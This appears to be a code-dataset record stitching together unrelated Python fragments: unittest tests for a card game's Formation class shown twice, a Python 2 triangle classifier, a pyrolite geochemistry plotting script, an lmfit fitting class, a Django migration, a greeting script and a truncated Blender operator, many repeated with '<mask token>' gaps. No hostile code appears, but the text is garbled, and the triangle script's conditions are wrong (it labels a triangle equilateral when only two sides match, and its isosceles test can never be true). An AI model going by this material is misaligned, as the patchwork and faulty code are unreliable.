def test_formation_with_less_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y')])
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(('R', 'Y', 'R'), formation.get_colors())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(('G', 'Y', 'R'), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
def test_formation_equality_with_wedge_and_battalion(self):
self.assertFalse(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'G'), (1, 'G'), (3,
'G')])))
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
def test_greater_than_check_phalanx_and_battalion(self):
self.assertTrue(Formation([(3, 'Y'), (3, 'R'), (3, 'B')]).
is_greater_strength_than(Formation([(1, 'G'), (3, 'G'), (6, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (6, 'G')]).
is_greater_strength_than(Formation([(3, 'Y'), (3, 'R'), (3, 'B')]))
)
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, 'G'), (6, 'G'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (3, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| import unittest
from battleline.model.Formation import Formation, FormationInvalidError
class TestFormation(unittest.TestCase):
def test_formation_with_less_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(
FormationInvalidError, "Formation must have 3 cards", Formation, [(1, "R"), (2, "Y")])
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError, "Formation must have 3 cards", Formation, [
(1, "R"), (2, "Y"), (3, "R"), (5, "G")])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, "R"), (3, "Y"), (2, "R")])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, "R"), (9, "Y"), (8, "R")])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, "R"), (3, "Y"), (2, "R")])
self.assertEquals(("R", "Y", "R"), formation.get_colors())
formation = Formation([(10, "G"), (9, "Y"), (8, "R")])
self.assertEquals(("G", "Y", "R"), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, "R"), (3, "Y"), (2, "R")])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, "G"), (9, "Y"), (8, "R")])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "R"), (2, "R"), (3, "R")])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "B"), (2, "B"), (4, "G")])))
self.assertFalse(Formation([(5, "R"), (1, "R"), (3, "Y")]).is_equivalent_in_strength(
Formation([(2, "B"), (3, "B"), (4, "B")])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "G"), (2, "G"), (3, "G")])))
def test_formation_equality_with_wedge_and_battalion(self):
self.assertFalse(Formation([(4, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(5, "G"), (1, "G"), (3, "G")])))
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "G"), (2, "G"), (3, "B")])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, "R"), (1, "G"), (1, "Y")]).is_equivalent_in_strength(
Formation([(1, "P"), (1, "B"), (1, "O")])))
self.assertFalse(Formation([(1, "R"), (1, "G"), (1, "Y")]).is_equivalent_in_strength(
Formation([(2, "P"), (2, "B"), (2, "O")])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, "R"), (2, "R"), (5, "R")]).is_equivalent_in_strength(
Formation([(5, "B"), (2, "B"), (3, "B")])))
self.assertFalse(Formation([(6, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(5, "B"), (2, "B"), (3, "B")])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "Y")]).is_equivalent_in_strength(
Formation([(1, "B"), (2, "B"), (3, "G")])))
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "Y")]).is_equivalent_in_strength(
Formation([(4, "B"), (2, "B"), (3, "G")])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, "R"), (4, "Y"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "G"), (4, "G"), (3, "B")])))
self.assertFalse(Formation([(1, "R"), (2, "Y"), (3, "R")]).is_equivalent_in_strength(
Formation([(4, "G"), (2, "G"), (3, "B")])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, "R"), (2, "R"), (3, "R")]).is_greater_strength_than(
Formation([(1, "R"), (2, "R"), (3, "R")])))
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "R")]).is_greater_strength_than(
Formation([(1, "R"), (2, "R"), (3, "R")])))
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "R")]).is_greater_strength_than(
Formation([(2, "R"), (2, "G"), (2, "B")])))
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, "Y"), (2, "R"), (2, "B")]).is_greater_strength_than(
Formation([(1, "Y"), (1, "R"), (1, "B")])))
self.assertFalse(Formation([(2, "Y"), (2, "R"), (2, "B")]).is_greater_strength_than(
Formation([(2, "P"), (2, "G"), (2, "O")])))
def test_greater_than_check_phalanx_and_battalion(self):
self.assertTrue(Formation([(3, "Y"), (3, "R"), (3, "B")]).is_greater_strength_than(
Formation([(1, "G"), (3, "G"), (6, "G")])))
self.assertFalse(Formation([(1, "G"), (3, "G"), (6, "G")]).is_greater_strength_than(
Formation([(3, "Y"), (3, "R"), (3, "B")])))
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, "G"), (3, "G"), (8, "G")]).is_greater_strength_than(
Formation([(4, "G"), (5, "G"), (2, "G")])))
self.assertFalse(Formation([(1, "G"), (3, "G"), (8, "G")]).is_greater_strength_than(
Formation([(4, "G"), (6, "G"), (2, "G")])))
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, "G"), (6, "G"), (2, "G")]).is_greater_strength_than(
Formation([(4, "G"), (3, "G"), (5, "B")])))
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, "G"), (2, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(3, "G"), (1, "G"), (2, "Y")])))
self.assertFalse(Formation([(4, "G"), (2, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(4, "Y"), (2, "B"), (3, "B")])))
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, "G"), (3, "B"), (2, "G")]).is_greater_strength_than(
Formation([(4, "G"), (9, "G"), (5, "B")])))
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, "G"), (8, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(1, "G"), (1, "R"), (2, "Y")])))
self.assertFalse(Formation([(4, "G"), (8, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(4, "P"), (8, "P"), (3, "O")])))
| [
18,
21,
22,
25,
26
] |
1,649 | 81233eb12b8447d017b31f200ab7902dcce45496 | a = float(input('Digite um valor: '))
b = float(input('Digite outro valor: '))
c = float(input('Digite mais um valor: '))
if a == b or b == c:
print('Com os números digitados, formam um triângulo EQUILATERO.')
elif a <> b and b <> c and c == a and b == c:
print('Com os números digitados, formam um triângulo ISOSELES.')
else:
print('Com os número digitados, formam triângulo ESCALENO.') | null | null | null | null | [
0
] |
1,650 | f6fee18898636ad6b0dc6d96d28dead4e09b8035 | <mask token>
| <mask token>
sns.set()
<mask token>
MG.pyroplot.spider(color='green', alpha=0.5, mode='fill')
VCCR.pyroplot.spider(color='red', alpha=0.5, mode='fill')
FG.pyroplot.spider(color='purple', alpha=0.5, mode='fill')
FGCP.pyroplot.spider(color='blue', alpha=0.5, mode='fill')
sns.set_style('darkgrid')
plt.show()
| <mask token>
sns.set()
<mask token>
df = pd.read_csv(
'/users/gennachiaro/Documents/Vanderbilt/Research/Ora Caldera/Trace Elements/Rare Earth Elements/REE_Mean_Normalized.csv'
, index_col=0)
MG = df.loc[['ORA-2A-001', 'ORA-2A-005', 'ORA-2A-018', 'ORA-2A-031',
'ORA-2A-032', 'ORA-2A-035', 'ORA-2A-040']]
VCCR = df.loc[['ORA-5B-402', 'ORA-5B-404A', 'ORA-5B-404B', 'ORA-5B-405',
'ORA-5B-406', 'ORA-5B-407', 'ORA-5B-408-SITE2', 'ORA-5B-408-SITE7',
'ORA-5B-408-SITE8', 'ORA-5B-409', 'ORA-5B-411', 'ORA-5B-412A-CG',
'ORA-5B-412B-CG', 'ORA-5B-413', 'ORA-5B-414-CG', 'ORA-5B-415',
'ORA-5B-416', 'ORA-5B-417']]
FG = df.loc[['ORA-5B-410', 'ORA-5B-412A-FG', 'ORA-5B-412B-FG', 'ORA-5B-414-FG']
]
FGCP = df.loc[['ORA-2A-002_Type1', 'ORA-2A-002_Type2', 'ORA-2A-002',
'ORA-2A-003', 'ORA-2A-016_Type1', 'ORA-2A-016-Type2',
'ORA-2A-016-Type3', 'ORA-2A-016-Type4', 'ORA-2A-023', 'ORA-2A-024',
'MINGLED1-ORA-2A-024', 'MINGLED2-ORA-2A-024', 'MINGLED3-ORA-2A-024']]
MG.pyroplot.spider(color='green', alpha=0.5, mode='fill')
VCCR.pyroplot.spider(color='red', alpha=0.5, mode='fill')
FG.pyroplot.spider(color='purple', alpha=0.5, mode='fill')
FGCP.pyroplot.spider(color='blue', alpha=0.5, mode='fill')
sns.set_style('darkgrid')
plt.show()
| <mask token>
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import pyrolite.plot
from pyrolite.plot.spider import spider
df = pd.read_csv(
'/users/gennachiaro/Documents/Vanderbilt/Research/Ora Caldera/Trace Elements/Rare Earth Elements/REE_Mean_Normalized.csv'
, index_col=0)
MG = df.loc[['ORA-2A-001', 'ORA-2A-005', 'ORA-2A-018', 'ORA-2A-031',
'ORA-2A-032', 'ORA-2A-035', 'ORA-2A-040']]
VCCR = df.loc[['ORA-5B-402', 'ORA-5B-404A', 'ORA-5B-404B', 'ORA-5B-405',
'ORA-5B-406', 'ORA-5B-407', 'ORA-5B-408-SITE2', 'ORA-5B-408-SITE7',
'ORA-5B-408-SITE8', 'ORA-5B-409', 'ORA-5B-411', 'ORA-5B-412A-CG',
'ORA-5B-412B-CG', 'ORA-5B-413', 'ORA-5B-414-CG', 'ORA-5B-415',
'ORA-5B-416', 'ORA-5B-417']]
FG = df.loc[['ORA-5B-410', 'ORA-5B-412A-FG', 'ORA-5B-412B-FG', 'ORA-5B-414-FG']
]
FGCP = df.loc[['ORA-2A-002_Type1', 'ORA-2A-002_Type2', 'ORA-2A-002',
'ORA-2A-003', 'ORA-2A-016_Type1', 'ORA-2A-016-Type2',
'ORA-2A-016-Type3', 'ORA-2A-016-Type4', 'ORA-2A-023', 'ORA-2A-024',
'MINGLED1-ORA-2A-024', 'MINGLED2-ORA-2A-024', 'MINGLED3-ORA-2A-024']]
MG.pyroplot.spider(color='green', alpha=0.5, mode='fill')
VCCR.pyroplot.spider(color='red', alpha=0.5, mode='fill')
FG.pyroplot.spider(color='purple', alpha=0.5, mode='fill')
FGCP.pyroplot.spider(color='blue', alpha=0.5, mode='fill')
sns.set_style('darkgrid')
plt.show()
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 18 13:36:13 2019
@author: gennachiaro
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
import pyrolite.plot
from pyrolite.plot.spider import spider
#read in data
df = pd.read_csv('/users/gennachiaro/Documents/Vanderbilt/Research/Ora Caldera/Trace Elements/Rare Earth Elements/REE_Mean_Normalized.csv', index_col=0)
#set values
MG = df.loc[['ORA-2A-001','ORA-2A-005','ORA-2A-018','ORA-2A-031','ORA-2A-032','ORA-2A-035','ORA-2A-040']]
VCCR = df.loc [['ORA-5B-402','ORA-5B-404A','ORA-5B-404B','ORA-5B-405','ORA-5B-406','ORA-5B-407','ORA-5B-408-SITE2','ORA-5B-408-SITE7','ORA-5B-408-SITE8','ORA-5B-409','ORA-5B-411','ORA-5B-412A-CG','ORA-5B-412B-CG','ORA-5B-413','ORA-5B-414-CG','ORA-5B-415','ORA-5B-416','ORA-5B-417']]
FG = df.loc [['ORA-5B-410','ORA-5B-412A-FG','ORA-5B-412B-FG','ORA-5B-414-FG']]
FGCP = df.loc[['ORA-2A-002_Type1','ORA-2A-002_Type2','ORA-2A-002','ORA-2A-003','ORA-2A-016_Type1','ORA-2A-016-Type2','ORA-2A-016-Type3','ORA-2A-016-Type4','ORA-2A-023','ORA-2A-024','MINGLED1-ORA-2A-024','MINGLED2-ORA-2A-024','MINGLED3-ORA-2A-024']]
#plot diagrams
MG.pyroplot.spider(color="green",alpha = 0.5, mode = "fill")
VCCR.pyroplot.spider(color="red",alpha = 0.5, mode = "fill")
FG.pyroplot.spider(color="purple",alpha = 0.5, mode = "fill")
FGCP.pyroplot.spider(color="blue",alpha = 0.5, mode = "fill")
#set background
sns.set_style("darkgrid")
#plot graph
plt.show() | [
0,
1,
2,
3,
4
] |
1,651 | 9e16921d83a5f62aad694b26a92b57b97ccda461 | <mask token>
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
<mask token>
def get_opt_parameters(self):
if self.fit_result is None:
raise ValueError('No fit result! Do a fit before asking for')
return self.fit_result.params.valuesdict()
<mask token>
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| <mask token>
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
<mask token>
def get_opt_parameters(self):
if self.fit_result is None:
raise ValueError('No fit result! Do a fit before asking for')
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| <mask token>
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
def do_minimisation(self, x, data, weights=1, **kwargs):
self.fit_result = minimize(self.residuals_wrapper, self.parameters,
args=(x, data, weights), kws=kwargs)
logging.info('Fit Result')
logging.info('==========')
return self.fit_result
def get_opt_parameters(self):
if self.fit_result is None:
raise ValueError('No fit result! Do a fit before asking for')
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| <mask token>
import numpy as np
import matplotlib.pyplot as plt
from lmfit import minimize, Parameters, fit_report
import logging
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
def do_minimisation(self, x, data, weights=1, **kwargs):
self.fit_result = minimize(self.residuals_wrapper, self.parameters,
args=(x, data, weights), kws=kwargs)
logging.info('Fit Result')
logging.info('==========')
return self.fit_result
def get_opt_parameters(self):
if self.fit_result is None:
raise ValueError('No fit result! Do a fit before asking for')
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| """After seeing how great the lmfit package, I was inspired to create my own
object using it. This acts as a fitting template.
"""
##-------------------------------PREAMBLE-----------------------------------##
import numpy as np
import matplotlib.pyplot as plt
from lmfit import minimize, Parameters, fit_report
import logging
##-------------------------------CLASS DEFINITION-----------------------------------##
class FitTemplate():
def __init__(self, fit_function, log_dir = None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
#setup logging. warning level is standard and is sent to stdout. info is requested by log_dir argument,
#and is printed to log file
if log_dir is not None:
logging.basicConfig(filename=log_dir +'log.log', level=logging.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data,weights,**kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data)*weights)**2
def do_minimisation(self, x, data, weights = 1, **kwargs):
self.fit_result = minimize(self.residuals_wrapper, self.parameters, args = (x, data, weights), kws = kwargs)
logging.info('Fit Result')
logging.info('==========')
return self.fit_result
def get_opt_parameters(self):
if self.fit_result is None:
raise ValueError("No fit result! Do a fit before asking for")
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info((fit_report(self.fit_result)))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel = None, ylabel = None, title = None, errorbars = None, label = None, ax = None, c = None, colour_index = None, **kwargs):
if ax is None:
_, ax = plt.subplots(1 ,1, constrained_layout=True, figsize=(18, 9))
plt.rcParams.update({'font.size': 16})
colours = ['b','m','c','r','tab:orange', 'tab:pink']
#decide colour
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
#scatter plot
ax.scatter(x, y, color = color)
#plot errors
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls = 'none', c = color, capsize = 3)
#plot model
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.params.valuesdict(), **kwargs), c = color, label = label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| [
6,
7,
8,
9,
10
] |
1,652 | 0cba18ca7126dda548a09f34dc26b83d6471bf68 | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('courses', '0015_auto_20151216_1136')]
operations = [migrations.AlterField(model_name='duration', name=
'duration', field=models.DecimalField(default=60, verbose_name=
'duration', max_digits=10, decimal_places=0))]
| from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('courses', '0015_auto_20151216_1136')]
operations = [migrations.AlterField(model_name='duration', name=
'duration', field=models.DecimalField(default=60, verbose_name=
'duration', max_digits=10, decimal_places=0))]
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0015_auto_20151216_1136'),
]
operations = [
migrations.AlterField(
model_name='duration',
name='duration',
field=models.DecimalField(default=60, verbose_name='duration', max_digits=10, decimal_places=0),
),
]
| [
0,
1,
2,
3,
4
] |
1,653 | a28c62a18d793fb285353902d01801c720bcb454 | #this apps is open
#Let's start with introduction
print "Hi, I am x0x. Could we introduce ourselves? (yes/no)"
answer = raw_input()
if answer.lower() == 'yes':
print "Okay, what is your name?"
name = raw_input()
print "Hi", name
print "Nice to meet you."
print "What are you going to do?"
print '1. Say "good bye"'
print '2. Say "Thank you"'
answer = raw_input()
if answer == '1':
print 'Well, good bye', name
elif answer == '2':
print 'Sakalangkong', name
else:
print 'You choose wrong answer, I am terminated.'
print 'bye'
elif answer.lower() == 'no':
print "thank you"
else:
print "your answer is wrong"
print "Please come back later. Thank you!"
print "yoyoi oke"
| null | null | null | null | [
0
] |
1,654 | f7a511beaea869cf32eb905a4f3685077297a5ec | <mask token>
class CenterOriginToZero(bpy.types.Operator):
<mask token>
<mask token>
<mask token>
<mask token>
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
